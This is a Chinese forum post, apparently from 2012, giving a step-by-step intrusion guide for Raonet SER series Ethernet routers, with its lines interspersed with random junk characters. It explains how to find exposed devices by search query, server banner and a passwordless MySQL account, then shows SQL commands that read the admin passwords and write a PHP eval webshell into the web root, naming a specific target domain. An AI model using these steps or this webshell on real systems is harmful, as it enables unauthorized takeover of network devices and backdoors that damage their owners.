寻找存在漏洞的路由器方法:; X6 U3 |+ P/ ^' f
# a* ^4 m6 v( Z9 A- l1:google搜索'Raonet Subscriber Ethernet Router'; y/ d: W! q3 k3 {9 t
( H! S/ S+ |- F" E9 w2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
1 {& A3 a3 X' [5 c! \% T9 p _0 _; Y. s( ]1 l
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
' G% `" ^* n0 [, d8 e. L# V% K
- ~) ?7 M8 |% X$ u& D//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
% }4 J3 |1 O( r9 W% r) ]7 ~5 F8 y0 |1 z: O
) K5 p0 l0 o; D# X' o. D v- v- X8 A4 r! e% I8 m+ d) G# K2 ]
入侵步骤:# A! @: h9 a Z; q% P$ K
4 z* z' M6 O9 [& E/ w
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php3 F$ `( Z5 g9 |% ~
4 ]6 C8 o0 ?* E. O2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc& k' |( h6 C- ]/ z- V9 c* z- n
3:得到密码后连接,查看GUI管理密码:) V" U) z2 |. v- k+ E5 a N1 q
use ser_500# F9 M, ?2 t5 f( _+ x+ k0 _
select id,passwd from user;& Q2 O" h# s+ u+ @* C7 t
4:通过数据库写入webshell,执行命令:8 {1 c3 _9 y1 b6 r0 ^- W
use mysql;
. U7 b. T. o9 C# h" r# c* h8 pcreate table ok(cmd TEXT);
' q& @5 A: R I! _+ d1 J' einsert into ok values("<?php @eval($_POST[cmd])?>");' p3 |- B9 ?9 E( O6 ]& K
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
4 ] _1 i$ g: Udrop table ok;
& K6 f3 A' }6 Y; V2 k) ]" F( p0 C$ c- H- U8 [! T
5:连接后门shell.php
5 O0 L+ @! ?' ]% i/ l) r3 [
# d3 F4 f& m' C. D& \6. 搞定!
4 i0 u2 W" H% \8 n) w
, [& t8 t _5 m8 n, J# D |
发表于 2012-12-10 10:30:18
收藏
支持
反对
发表于 2013-7-27 20:06:50